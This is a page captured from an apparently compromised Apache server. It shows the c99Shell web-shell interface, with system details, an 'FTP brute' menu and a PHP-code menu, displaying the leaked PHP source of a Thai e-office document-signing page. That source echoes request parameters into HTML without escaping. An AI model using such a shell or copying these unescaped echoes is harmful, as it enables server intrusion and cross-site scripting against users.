!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showDetailRegisSignDoc.php (31.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocLinePosition.php";
include_once "../class/clsDocLineConfig.php";
include_once "../class/clsReceiveSendType.php";
include_once "../class/clsDocType.php";
include_once "../class/clsDocSpeedLevel.php";
include_once "../class/clsDocSecreLevel.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsDocuments.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocReceiveSend.php";
include_once "../class/clsProposeType.php";
include_once "funct.php";
include_once "../class/clsannounceDocType.php";
include_once "../link/keyThai.php";
include_once "../class/clsDocWSign.php";
include_once "getPrefix.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlc4 = new DocLineConfig($oC);
$oDlc5 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3=new Documents($oC);
$oDatt = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs5 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oRs8 = new DocReceiveSend($oC);
$oPt = new ProposeType($oC);
$oAn=new announceDocType($oC);
$MaxDocGroup=$oDP->SearchMaxDocGroup();
$oDws = new docwsign($oC);

if($DLCID && $one_position!="1"){ include_once "selectposition.php";
?>

<?
	$oDlc->SearchByKey($DLCID); $oDlc->GetRecord(); 
	$oDoc->SearchByKey($DocID); $oDoc->GetRecord(); 	
	$oRs7->SearchByDrsFromDrsIDDsID2($DrsID);
	if($oRs7->GetRecord()=="1"){
		$oRs5->SearchByKey($oRs7->DrsID);$oRs5->GetRecord();
		//echo "status=2->".$oRs5->DrsID;
	}else{
		$oRs5->SearchByKey($DrsID);$oRs5->GetRecord();
		//echo "status=1->".$oRs5->DrsID;
	}
	//echo $DLCID."<br>"; 
	//echo $oDlc->personId; 

?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>

<body>
<table  width="100%"  align="center">
<tr><td >
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="regisDoc.php">ลงทะเบียนใหม่/เสนอหนังสือ</a>
	  <img src="../picture/ico3.gif" width="10" border="0" align="absmiddle">รายละเอียดข้อมูลทะเบียนหนังสือ</font>
	</font></legend>
		<form name="ff"  METHOD="POST" action="processProposeDoc.php">
		<table align="center" width="93%" >
        <tr>
          <td width="68%" height="25"><img src="../picture/official_letter.gif" alt=""  border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="3"><strong>การเสนอเซ็นหนังสือ</strong></font> 
           </td>
          </tr>
        <tr>
          <td  colspan="3"><hr color="#000099"></hr>
          </td>
        </tr>
      </table>
	  <table width="93%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">
	  <tr><td colspan="2" background="../picture/table_header_bg2.gif" height="25">
	  <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong> 
					&nbsp;รายละเอียดของหนังสือ: </strong></font> 
					<font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="2"><strong>
					<?   if($RsID==1){    
								echo $oRSt->SearchShowRsName(1); 
							}else if($RsID==2){   
								echo $oRSt->SearchShowRsName(2); 
							}else if($oDoc->RsID==3){  
								echo $oRSt->SearchShowRsName(3); 
							}else if($RsID==4){  
								echo $oRSt->SearchShowRsName(4); 
							}
					?>
					</strong></font>
					<font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong> ชนิดหนังสือ: </strong></font>
					<font color="<?php echo $GLOBALS["COLOR_FONT_8"]; ?>" size="2"><strong>
					  <? $oDt->SearchByKey($DtID);
							 $oDt->GetRecord();
							 echo $oDt->DtName;
					?>
					</strong></font>
	  </td></tr>
	  <tr>
	  <? //---------detail doc------------------------------?>
	  <td width="52%" align="center" valign="top">
			  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"><tr>
                  <td valign="top"> 
                    <table width="97%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#DADADA" style="border-collapse:collapse">
			  <tr><td>&nbsp;</td></tr>
			 <tr height=22><td width="32%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong><? echo ShowNameDocNo($DtID); ?></strong></td>
					<td width="1%" align="center"><strong>:</strong></td>
					<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DtID!="15"){ if($oDoc->DocNo!=""){  echo $oDoc->DocNo;   }}else{  echo '-'; } ?></td></tr>
			 <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong><? echo ShowNameDate2($DtID); ?></strong></td>
					<td width="2%" align="center" ><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
					<?   if($oDoc->DocDate!="" && $oDoc->DocDate!="0000-00-00"){ 
												echo "&nbsp;".abbreDate2($oDoc->DocDate,'/');
							} ?>
					</td></tr>
			 <? //if($DtID!=13){ ?>
			  <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>" >&nbsp;<strong><? echo ShowNameSubject($DtID); ?></strong></td>
					<td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<?  if($oDoc->DocSubject!=""){ echo  $oDoc->DocSubject;  } ?></td>
			</tr>
			<? //} ?>
			<? if($DtID==1 || $DtID==2 || $DtID==3 ||  $DtID==14 || $DtID==13 || $DtID==15){?>  
			  <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong><? echo ShowNameFrom($DtID); ?></strong></td>
					<td width="2%" align="center"><strong>:</strong></td>
					<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocFrom!=""){ echo  $oDoc->DocFrom;  } ?></td>
				  </tr>
			<? } ?>
			<? if($DtID==13){?>  
			  <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>ชื่อผู้ได้รับการรับรอง</strong></td>
					<td width="2%" align="center"><strong>:</strong></td>
					<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->CertificatePs!=""){   echo $oDoc->CertificatePs; } ?></td>
				  </tr>
			<? } ?>
			<? if($DtID==1 || $DtID==2  || $DtID==14 || $DtID==3 || $DtID==15){?>
			   <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong><? if($DtID==3 || $DtID==15){   echo "เรียน"; }else{  echo "ถึง"; } ?></strong></td>
						<td width="2%" align="center"><strong>:</strong></td>
					<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<?  if($oDoc->DocTo!=""){   echo $oDoc->DocTo; }?></td>		
				  </tr>
			<? }?>
			  <tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>แฟ้มหนังสือ</strong></td>
						<td width="2%" align="center"><strong>:</strong></td>
						  <td width="67%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
						  <? if($oDoc->DocPID=="0" || $oDoc->DocPID==""){  $searchDoc=$oDoc->DocID; }else{ $searchDoc=$oDoc->DocPID; } ?>
						   <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>"> 
							&nbsp;<img src="../picture/attach_ico.gif" alt=""  border="0" >&nbsp;แฟ้มที่เกี่ยวข้อง&nbsp;<? echo $oDatt->CountDocByDocID($searchDoc); ?>&nbsp;รายการ<br></font> 
							<?
								$oDatt->SearchByDocID($searchDoc);
								while($oDatt->GetRecord()){  
									$c++;  
									$pathfile="../documents/".$oDatt->DaUpFileName; 
								?>
									&nbsp;<a href="<? echo $pathfile ; ?>" target="_blank"><img src="../picture/allregistered_ico.gif" alt="เปิดดูแฟ้มหนังสือ"  border="0"  style="cursor:pointer;" ></a>&nbsp; 
								<?	echo "&nbsp;".$c.".&nbsp;".$oDatt->DaFileName."<br>";
								} ?>
						  </td>						
			</tr>
			<? if(($DtID==1 || $DtID==2) && ($RsID=="2" || $RsID=="1")){?>
			<tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>อ้างถึง</strong></td>
						<td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocRef!=""){   echo $oDoc->DocRef; } ?></td>
			</tr>	
			<tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>สิ่งที่ส่งมาด้วย</strong></td>
						<td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocOther!=""){   echo $oDoc->DocOther; }?></td>
			</tr>
			<? } ?>
			<? if($DtID==3 && ($RsID=="3" || $RsID=="4")){?>
				<tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>อ้างถึงหนังสือ<br>เพื่อตอบกลับ</strong></td>
							<td width="2%" align="center"><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">&nbsp;<? if($oDoc->DocRefAns!=""){   echo $oDoc->DocRefAns; } ?></td>
				</tr>	
				<? } ?>
			<? if($DtID==1 || $DtID==2 || $DtID==3 || $DtID==14 || $DtID==15){?> 
			<tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>ชั้นความเร็ว</strong></td>
						<td width="2%" align="center"><strong>:</strong></td>
					<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
					<? $oDsl->SearchByKey($oDoc->DslID); $oDsl->GetRecord();  echo "&nbsp;".$oDsl->DslName;?>
					 </td></tr>
			<tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>ชั้นความลับ</strong></td>
						<td width="2%" align="center" ><strong>:</strong></td><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>">
						<? $oDcl->SearchByKey($oDoc->DclID); $oDcl->GetRecord();  echo "&nbsp;".$oDcl->DclName;?></td>
			</tr>
			<? } ?>
			<tr height=22><td width="31%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;<strong>หมายเหตุ</strong></td>
						<td width="2%" align="center"><strong>:</strong></td>
						  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>"> 
							<? if($oDoc->DocShortDesc!=""){ echo "&nbsp;".$oDoc->DocShortDesc;  }  ?>
						  </td>
						</tr>
<? if($oDoc->DocforSign=="Y"){  ?>
	<tr height=22><td width="25%">&nbsp;</td>
	   			<td width="2%" align="center">&nbsp;</td>
                  <td > 
                  <input name="" type="checkbox" value="" checked disabled> ลงทะเบียนหนังสือลงนาม
                  </td>
                </tr>
	<? } ?>
				<? if($oDoc->sendToPs=="Y"){  ?>
	<tr height=22><td width="25%">&nbsp;</td>
	   			<td width="2%" align="center">&nbsp;</td>
                  <td > 
                  <input name="" type="checkbox" value="" checked disabled> ส่งด่วน
                  </td>
                </tr>
	<? } ?>
			<tr><td>&nbsp;</td></tr>
			  </table>
			  </td></tr>
			  <?  if($oRs5->DrsSendDate=="0000-00-00 00:00:00"){  ?>
			  <tr><td align="center"><input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'regisDoc.php?DtID=<? echo $DtID;?>&RsID=<? echo $RsID;?>&flagshow=<? echo $flagshow; ?>&monthe=<? echo $monthe;?>&searchYear=<? echo $searchYear; ?>&searchName=<? echo $searchName; ?>&searchNo=<? echo $searchNo; ?>'"></td></tr>
			  <? } ?>
			  </table>
	  </td>
	  <? //---------propose doc------------------------------
	  if($oRs5->DrsSendDate!="0000-00-00 00:00:00"){
	  ?>
	  
	  <td width="48%" align="center" valign="top">
	  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>"><tr><td >
	 <? 
	 		if($oRs5->DrsByPass=="Y"){ //ส่งผ่าน
	?>
			<table width="97%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" style="border-collapse:collapse">
			 <tr  height=25 valign="middle">
                  <td colspan="3" height="25"> <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"><strong> 
            <br>&nbsp;รายละเอียดสำหรับเสนอลงนาม<br></strong></font></td>
                </tr>
                <tr  height=25 valign="middle" align="center">
                  <td colspan="3" height="25" align="center"> <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2"><strong> 
            <br>&nbsp;&nbsp;&nbsp;&nbsp;หนังสือ<? if($oDoc->DtID!="15"){ echo "ส่งผ่าน"; }else{  echo "ส่งผ่าน/ลงนามแล้ว"; } ?> ไม่มีการเสนอเซ็น<br>
			</strong></font></td>
                </tr>		
			</table>
	<?		
			}else{  //ไม่ส่งผ่าน		
	 		if($caseother!="1"){   
	?>
	          <table width="97%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" style="border-collapse:collapse">
                <tr  height=25 valign="middle">
                  <td colspan="3" height="25"> <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"><strong> 
            <br>&nbsp;รายละเอียดสำหรับเสนอลงนาม<br></strong></font></td>
                </tr>
                <tr height="40">
                  <td width="33%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" >&nbsp;&nbsp;<strong>ผู้มีอำนาจลงนาม</strong></td>
                  <td width="1%" align="center"><strong>:</strong></td>
                  <td width="66%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="center">&nbsp;
				 <?	
								$oPS->SearchByKey($oRs5->DrsReceivePersonId); $oPS->GetRecord();  
								echo "&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."<br>";
								 $oDlc2->SearchByKey($oRs5->DlcID); $oDlc2->GetRecord(); 
								$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
							?>
							<font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">
							<?
								echo "&nbsp;&nbsp;&nbsp;(".$oDlp->DlpName.")"; 			
						  ?></font>
					<? //}?>
                  </td>
				  
                </tr>
				<tr>
                  <td width="33%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>">&nbsp;&nbsp;<strong>การบันทึกต่อเนื่อง</strong></td>
				    <td width="1%" align="center" ><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>" align="left">&nbsp;
				  <? echo nl2br($oRs5->DrsPropose);  ?>
				  </td>
				  </tr>
               <tr>
                  <td width="33%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>">&nbsp;&nbsp;<strong>ผู้เสนอลงนาม</strong></td>
                  <td width="1%" align="center" ><strong>:</strong></td>
                  <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_17"]; ?>" align="center">
				  <table>
				 <tr><td align="center">
						   <? $oPS->SearchByKey($oRs5->DrsPsIDCreate); $oPS->GetRecord();  
						   		echo "&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."<br>"; 
								$oDlc4->SearchByKey($oRs5->DrsDlcIDCreate); $oDlc4->GetRecord(); 
								$oDlp->SearchByKey($oDlc4->DlpID);  $oDlp->GetRecord();
					?>
					<font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">
					<?
								echo "&nbsp;&nbsp;&nbsp;(".$oDlp->DlpName.")<br>"; 
								list($DocD,$DocT) = split(' ',$oRs5->DrsReceiveDate );
								echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT)."&nbsp;"; 
					  ?></font>   
						  </td></tr>
				  </table>
				  </td>
                </tr>
              </table>
			  <?  } //if case other
			}?>
	  </td></tr>
	  <tr><td align="center"><br><br><input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'regisDoc.php?DtID=<? echo $DtID;?>&RsID=<? echo $RsID;?>&flagshow=<? echo $flagshow; ?>&monthe=<? echo $monthe;?>&searchYear=<? echo $searchYear; ?>&searchName=<? echo $searchName; ?>&searchNo=<? echo $searchNo; ?>'"></td></tr>
	  </table>
	  </td>
	  <? } //have send
	  		//---------end propose doc------------------------?>
	  </tr></table>
        <br>
	  <? 
	  //if($oDoc->RsID=="3"){  
	  
	   if($oDlc->DlcView=="Y"){ 
	   		$lineDoc=GetLineDoc($oRs5->DocID,$oDoc->DocGroup,$oRs5->DsID,$oRs5->DrsID);
			$checkshow=0; 
			if($lineDoc!=$oRs5->DrsID){ $lineDoc=$lineDoc.$oRs5->DrsID;  $checkshow=1;}  //echo "=".$lineDoc."<br>";
	   ?>
	   <br>
	    <table width="93%" border="0" align="center" cellpadding="0" cellspacing="0" >
	  <tr><td align="right"><a onClick = "showline('<? echo $searchDoc;?>')" style="cursor:pointer;"><img src="../picture/button_showline.jpg" alt=""  border="0" style="cursor:pointer;"></a>
	  &nbsp;<a onClick = "showline2('<? echo $searchDoc;?>')" style="cursor:pointer;"><img src="../picture/sign_tc.jpg" alt=""  border="0" style="cursor:pointer;"></a>&nbsp;
	  </td></tr>
	  </table>
	  <table width="93%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFCC99" >
	  <tr><td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse"  background="../picture/table_header_bg4.gif">
        <tr>
          <td width="68%" height="25">
            <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>&nbsp;<? if($checkshow==1){ ?>เส้นทางเดินของหนังสือ<? }else{ ?>ข้อมูลการลงรับหนังสือ <? } ?></strong></font>
			 </td>
		</tr>
      </table><br>
	          <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse">
                <tr> 
                  <td  align="center">
				   <? if($checkshow==1){ ?><div style="overflow: auto; height: 300px; width: 100%;"><? } ?>
				  <? 
						while($lineDoc!=""){
								list($line,$lineDoc)=split(',',$lineDoc,2);
								
								$oRs2->SearchByKey($line);
								$oRs2->GetRecord();
								$oDoc2->SearchByKey($oRs2->DocID);
								$oDoc2->GetRecord();
								$oDlc3->SearchByKey($oDoc2->DlcID); 
								$oDlc3->GetRecord(); 
								   if($oRs2->DsID=="1"){
							?>		 
                    <table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse">
                      <tr height=22>
                        <td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการลงรับของหน่วยงาน&nbsp;<?  $oDP->SearchByKey($oDlc3->deptId); $oDP->GetRecord();  echo $oDP->deptName;?></strong><br>
						</td>
                      </tr>
					   <tr height=22>
					   <td width="33%">&nbsp;&nbsp;ชนิดหนังสือ : <? $oDt->SearchByKey($oDoc2->DtID);  $oDt->GetRecord(); echo $oDt->DtName; ?></td>
						<td width="23%">เลขทะเบียน<? echo ShowNameRSDoc2($oDoc2->RsID);?> : <?php echo a2th($oDoc2->DocTypeNo);?></td>
						<td width="44%">วันที่ลงทะเบียน : <?php 
							list($DocD,$DocT) = split(' ',$oDoc2->DocDateCreate);
							echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); ?></td>
                      </tr>
                      <tr height=22>
                        <td colspan="3">&nbsp;&nbsp;ลงรับโดย : <? $oPS->SearchByKey($oRs2->DrsReceivePersonId); $oPS->GetRecord();   ?>
                          <? echo "&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName; ?> 
                          <? 	$oDlp->SearchByKey($oDlc3->DlpID);  $oDlp->GetRecord();
						  			echo "&nbsp;(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->deptName).")"; ?></td>
                      </tr>
					  <tr>
					  <td colspan=3><hr color="#C87904"></hr></td>
					  </tr>
                    </table>	
				  			<? }else if($oRs2->DsID=="2"){ ?>
				  				<table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" style="border-collapse:collapse">
								 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการเสนอลงนาม</strong></td></tr>
								 <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
								 		<td width="0%"  align="center" ><strong>:</strong></td>
								        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs2->DrsPropose); ?></td>
								 </tr>
								 <tr height=22>
									<td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้เสนอลงนาม</td>
									<td width="0%"  align="center" ><strong>:</strong></td>
									<?   $oRs3->SearchByKey($oRs2->DrsFromDrsID);
											$oRs3->GetRecord();
									?>
									<td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>" align="center">
									<? $oPS->SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord();   ?>
									  <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"; ?> 
									  <? 	$oDlc5->SearchByKey($oRs2->DrsDlcIDCreate);  $oDlc5->GetRecord();	
									  			$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();			
									  			echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";  
												list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate );
												echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
												?>
									</td>
								  </tr>
								<tr>
							  <td colspan=3><hr color="#C87904"></hr></td>
							  </tr>
								 </table>
<? 			if($oRs2->DrsWSign=='Y'){  //case DrsWSign 
											$oDws->SearchByDrsIDDocID($oRs2->DrsID,$oRs2->DocID);
											$oDws->GetRecord();
							?>
								<table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" style="border-collapse:collapse">
								 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการรอเสนอผอก./หน.</strong></td></tr>
								 <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
								 		<td width="0%"  align="center" ><strong>:</strong></td>
								        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oDws->DocSign); ?></td>
								 </tr>
								 <tr height=22>
									<td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ลงนาม</td>
									<td width="0%"  align="center" ><strong>:</strong></td>
									<td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>"  align="center">
									<?  $oPS->SearchByKey($oDws->personId); $oPS->GetRecord();   ?>
									  <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"; ?> 
									  <? 	$oDlc5->SearchByKey($oDws->DlcID);  $oDlc5->GetRecord();	
									  			$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
									  			echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";  
												list($DocD,$DocT) = split(' ',$oDws->signDateTime);
												echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
												?>
									</td>
								  </tr>
								<tr>
							  <td colspan=3><hr color="#C87904"></hr></td>
							  </tr>
								 </table>
							<? } //case DrsWSign?>
				  		   <? }else if($oRs2->DsID=="3"){  
						   					$oRs4->SearchByKey($oRs2->DrsFromDrsID);
											$oRs4->GetRecord();
											if($oRs4->DrsByPass!="Y"){				
						   ?>
						   		<table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" style="border-collapse:collapse">
								 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการลงนาม</strong></td></tr>
								  <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
								 		<td width="0%"  align="center" ><strong>:</strong></td>
								        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs2->DrsSign); ?></td>
								 </tr>
								 <tr height=22>
									<td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ลงนาม</td>
									<td width="0%"  align="center" ><strong>:</strong></td>
									<td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>" align="center">
									<? $oPS->SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord();   ?>
									  <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"; ?> 
									  <? 	
									  			$oDlc5->SearchByKey($oRs2->DrsDlcIDCreate);  $oDlc5->GetRecord();	
									  			$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
									  			echo "(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;"; 
												list($DocD,$DocT) = split(' ',$oRs2->DrsReceiveDate );
												echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
												?>
									</td>
								  </tr>
								<tr>
							  <td colspan=3><hr color="#C87904"></hr></td>
							  </tr>
								 </table>
								 <?  }
								 		}else if($oRs2->DsID=="0" || $oRs2->DsID=="4" || $oRs2->DsID=="5"){  ?>
								 <?  //if($oRs2->DrsSendDate!="0000-00-00 00-00-00"){  //show status=3 send to person ?>
								 <?   $oRs6->SearchByKey($oRs2->DrsID);
											$oRs6->GetRecord();
											//echo "DrsID=".$oRs6->DrsID."<br>"; 
									?>
								 <table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" style="border-collapse:collapse">
								 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการส่งถึงผู้รับผิดชอบ</strong></td></tr>
								 <? if($oRs6->PtID!=0 && $oRs6->PtID!=""){ 
								 			$oPt->SearchByKey($oRs6->PtID);
											$oPt->GetRecord();
								 ?>
								 <? if($oRs6->DrsSendDocNew!="0000-00-00 00:00:00"){  ?>
								  <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ส่งเพิ่มเติม</td>
											<td><strong>:</strong></td>
											<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;
											<? list($DocD2,$DocT2) = split(' ',$oRs6->DrsSendDocNew);
												echo abbreDate2($DocD2,'/')."&nbsp;".a2th($DocT2); 
											 ?></td>
								</tr>
								<? } ?>
								  <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ลักษณะหนังสือ</td>
											<td><strong>:</strong></td>
											<td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;<? echo $oPt->PtName; ?></td>
